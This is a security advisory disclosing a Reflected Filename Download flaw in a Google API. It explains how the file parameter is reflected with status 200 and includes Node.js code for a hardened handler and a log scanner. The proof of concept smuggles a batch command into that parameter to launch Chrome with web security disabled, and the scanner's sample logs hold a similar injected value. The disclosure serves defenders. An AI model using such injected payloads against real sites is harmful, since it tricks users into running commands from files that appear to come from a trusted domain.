Reflected Filename Download on Google

WS201510 - Reflected Filename Download on Google
by David Sopas @dsopas
www.websegura.net

Description:

I found a Reflected Filename Download on a Google API, Google UDS [User Distributed Search].
For me it was a challenge and a pleasure to find this one, because so far I had only discovered Reflected Filename Download vulnerabilities in JSON files.
People need to consider that RFD is not a JSON-specific issue.
You can find this type of vulnerability in other response types too, like this one in JavaScript.

The security issue is located at:

https://www.google.com/uds/?file=gdata&v=1.x

And here:

https://adwords.google.com/uds/?file=dont_exists&v=1.x

Where you can inject into and manipulate the response using the file variable.
The problem is that even if the file/module doesn't exist, the endpoint still returns HTTP code 200.

https://www.google.com/uds/?file=dont_exists&v=1.x

var error = new Error("Module: 'dont_exists' not found!");
error.toString = function() { return this.message; }
throw error;

[Screenshot: google_rfd_01]
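As an added example (not Google's code, and not part of the original advisory), the following Node.js functions model the two behaviours at issue: a loader that echoes an unknown module name into a JavaScript body with status 200, and a hardened variant that validates the name against an allowlist, never reflects it, answers unknown modules with 404, pins the download filename with Content-Disposition and sets X-Content-Type-Options: nosniff. The module names, module bodies and the pinned filename are assumptions made for this example.

```javascript
// Added example (not Google's code): a minimal model of the module-loader
// endpoint described in the advisory, built to compare the reflecting
// behaviour with a hardened version. Module names, bodies and the pinned
// filename are assumptions made for this example.
const KNOWN_MODULES = new Map([
  ["gdata", "/* constructed placeholder for the gdata module body */"],
  ["search", "/* constructed placeholder for the search module body */"],
]);
// Module names are expected to be short identifiers.
const MODULE_NAME = /^[A-Za-z0-9_]{1,64}$/;

// Vulnerable pattern: an unknown name is echoed into a JavaScript body with
// status 200 and no Content-Disposition, so the filename the browser uses
// comes from the link (or an HTML5 download attribute), not from the server.
function buildResponseVulnerable(file) {
  if (KNOWN_MODULES.has(file)) {
    return { status: 200, headers: { "Content-Type": "text/javascript" }, body: KNOWN_MODULES.get(file) };
  }
  // Quotes, backslashes and slashes are backslash-escaped, as in the
  // advisory's sample response; a batch interpreter ignores that escaping.
  const escaped = file.replace(/["\\/]/g, (c) => "\\" + c);
  return {
    status: 200,
    headers: { "Content-Type": "text/javascript" },
    body: 'var error = new Error("Module: \'' + escaped + '\' not found!");\n' +
      "error.toString = function() { return this.message; }\n" +
      "throw error;",
  };
}

// Hardened pattern: validate and allowlist the name, never reflect it,
// answer unknown modules with 404, pin the filename with Content-Disposition
// and forbid MIME sniffing. Browsers apply Content-Disposition only to
// navigations, so <script src> loads of the module keep working.
function buildResponseHardened(file) {
  const headers = {
    "X-Content-Type-Options": "nosniff",
    "Content-Disposition": 'attachment; filename="uds-module.js"',
  };
  if (typeof file !== "string" || !MODULE_NAME.test(file) || !KNOWN_MODULES.has(file)) {
    return {
      status: 404,
      headers: { ...headers, "Content-Type": "application/json; charset=utf-8" },
      body: JSON.stringify({ error: "module not found" }), // no echo of the input
    };
  }
  return {
    status: 200,
    headers: { ...headers, "Content-Type": "text/javascript; charset=utf-8" },
    body: KNOWN_MODULES.get(file),
  };
}

module.exports = { buildResponseVulnerable, buildResponseHardened };
```

The point of the hardened variant is that the server, not the link, decides the filename and the status code: with the name validated and never echoed, there is nothing attacker-controlled left in the body for a browser to save under a misleading name.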

Proof-of-concept:

Reflecting URL variables with HTTP code 200 is not always a good idea, and it gave me the opportunity to issue an RFD attack.

var error = new Error("Module: 'gdata\"||start chrome websegura.net\/malware.htm -disable-web-security -disable-popup-blocking||' not found!");
error.toString = function() { return this.message; }
throw error;

So the Reflected part is done. Now I only need to control the filename. Due to filename restrictions on the Google path I need to use the HTML5 A DOWNLOAD attribute to do this. Because of this, "only" the following browsers are supported:

- Chrome
- Opera
- Android Browser
- Chrome for Android
- Firefox [forcing the user to "Save Link As", done with a simple JavaScript return false;]

What this RFD attack does is this: when the user clicks on the download link, they get a file that appears to come from Google.com [a trusted domain], which gains credibility with the victim.
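From the defender's side, the request pattern this attack leaves behind is easy to pick out of access logs: a request to the /uds/ path whose file parameter is not a plain module name. The following Node.js snippet is an added example, not part of the advisory; the log format (Common Log Format), the sample lines and the IP addresses are constructed for illustration, and the module-name pattern is an assumption.

```javascript
// Added example (not part of the advisory): scan access-log lines for
// requests to the /uds/ path whose "file" parameter is not a plain module
// name. Log format, sample lines and the name pattern are assumptions.
const MODULE_NAME = /^[A-Za-z0-9_]+$/;

// Constructed sample lines in Common Log Format (documentation IP ranges).
const SAMPLE_LOG = [
  '203.0.113.5 - - [16/Mar/2015:10:00:01 +0000] "GET /uds/?file=gdata&v=1.x HTTP/1.1" 200 512',
  '203.0.113.5 - - [16/Mar/2015:10:00:02 +0000] "GET /uds/?file=dont_exists&v=1.x HTTP/1.1" 200 96',
  '198.51.100.7 - - [16/Mar/2015:10:00:03 +0000] "GET /uds/?file=gdata%22%7C%7Cecho%20test%7C%7C&v=1.x HTTP/1.1" 200 140',
  '198.51.100.7 - - [16/Mar/2015:10:00:04 +0000] "GET /search?q=uds HTTP/1.1" 200 2048',
];

// Pull the request target out of the quoted request line.
function parseRequestPath(line) {
  const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Returns null for lines that are not /uds/ requests, otherwise the decoded
// "file" value and whether it falls outside the expected identifier shape.
function classifyUdsRequest(line) {
  const path = parseRequestPath(line);
  if (!path) return null;
  // The base URL only exists so that a relative path can be parsed.
  const url = new URL(path, "https://example.invalid");
  if (url.pathname !== "/uds/") return null;
  const file = url.searchParams.get("file"); // percent-decoded
  if (file === null) return { file: null, suspicious: false };
  return { file, suspicious: !MODULE_NAME.test(file) };
}

// Decoded "file" values that contain quotes, pipes or other non-identifier
// characters, which is what an injected batch payload looks like.
function findSuspicious(lines) {
  return lines
    .map(classifyUdsRequest)
    .filter((r) => r !== null && r.suspicious)
    .map((r) => r.file);
}

module.exports = { parseRequestPath, classifyUdsRequest, findSuspicious, SAMPLE_LOG };
```

Note that the second sample line (an unknown module answered with 200) is not flagged: the detector only knows the identifier shape, not the module list, so that case is better caught by fixing the endpoint to return 404 than by log scanning.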

[Screenshot: google_rfd_02]
[Screenshot: google_rfd_03]

Google replied:

The reward panel reviewed this finding and decided that it does not meet the bar for a financial reward, but we would like to acknowledge your contribution to Google security in our Hall of Fame. A general perspective on the issue is shared here: http://lcamtuf.blogspot.com/2014/03/messing-around-with-download.html
That said, we do appreciate your report and would like to add you to our Hall of Fame available at the following URL:

This didn't get me any bounty, but they were nice enough to give me an Honorable Mention - my second one :)

Timeline:

16 Mar 15 - Submitted to Google
18 Mar 15 - Google filed the bug
07 Apr 15 - Google replied
08 Apr 15 - Full disclosure
